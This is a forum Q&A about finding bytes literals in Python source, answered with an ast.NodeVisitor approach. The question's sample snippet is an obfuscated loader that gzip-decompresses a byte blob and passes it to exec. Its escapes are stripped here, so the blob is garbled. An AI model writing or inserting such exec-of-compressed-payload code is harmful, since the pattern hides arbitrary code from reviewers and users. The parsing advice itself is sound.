Find all occurrences of bytestrings in a python code snippet

Question:

I’m trying to parse python snippets, some of which contains bytestrings.
for example:

"""
from gzip import decompress as __;_=exec;_(__(b'x1fx8bx08x00xcbYmcx02xffxbd7ixb3xdaJvxdfxdfxaf /Ixf9xbarxc6%x81@x92kx9c)x16I,bx95Xmx87x92Z-$xd0x86x16x10LM~{Nx03xd7xc6xd7x9e%xa9xa9PE/xa7xcfxbeukxd3xacmxdd"x94x1b'xa5xdax04"Hx17xaexe3txf4xcdnx03xa9/&T>x13xdbug=x9fx13~x11xf6x9bxd7x15~xb2xe7xbcxe6xc2Kxb8x18x03xfd|[x7fxe8xb8I;xf0xf1x93xecx83x8eo15x8dCxfcxc6Ixf1xfdxf5rx8fxebx0fxd7xc53#xa8<_xb2Pyxbexe1xdexffx0fk&x93xa8Vx18x00x00'))

x = b"x1fx8bx08"

y = "hello world"
"""

Is there a regex pattern I can use to correctly find those strings?

I have tried implementing a regex query myself, like so:

bytestrings= re.findall(r'b"(.+?)"', text) + re.findall(r"b'(.+?)'", text)

I was expecting to receive an array

[b'x1fx8bx08x00xcbYmcx02xffxbd7ixb3xdaJvxdfxdfxaf /Ixf9xbarxc6%x81@x92kx9c)x16I,bx95Xmx87x92Z-$xd0x86x16x10LM~{Nx03xd7xc6xd7x9e%xa9xa9PE/xa7xcfxbeukxd3xacmxdd"x94x1b'xa5xdax04"Hx17xaexe3txf4xcdnx03xa9/&T>x13xdbug=x9fx13~x11xf6x9bxd7x15~xb2xe7xbcxe6xc2Kxb8x18x03xfd|[x7fxe8xb8I;xf0xf1x93xecx83x8eo15x8dCxfcxc6Ixf1xfdxf5rx8fxebx0fxd7xc53#xa8<_xb2Pyxbexe1xdexffx0fk&x93xa8Vx18x00x00', b"x1fx8bx08"]

instead it returns an empty array.

Asked By: ze'ev han

||

Answers:

This isn’t a job for regular expressions, but for a Python parser.

import ast

code = """
...
"""

tree = ast.parse(code)

Now you can walk the tree looking for values of type ast.Constant whose value attributes have type bytes. Do this by defining a subclass of ast.NodeVisitor and overriding its visit_Constant method. This method will be called on each node of type ast.Constant in the tree, letting you examine the value. Here, we simply add appropriate values to a global list.

bytes_literals = []

class BytesLiteralCollector(ast.NodeVisitor):
    def visit_Constant(self, node):
        if isinstance(node.value, bytes):
            bytes_literals.append(node.value)

BytesLiteralCollector().visit(tree)

The documentation for NodeVisitor is not great. Aside from the two documented methods visit and generic_visit, I believe you can define visit_* where * can be any of the node types defined in the abstract grammar presented at the start of the documentation.

You can use print(ast.dump(ast.parse(code), indent=4)) to get a more-or-less readable representation of the tree that your visitor will walk.

Answered By: chepner
Categories: questions Tags: ,
Answers are sorted by their score. The answer accepted by the question owner as the best is marked with
at the top-right corner.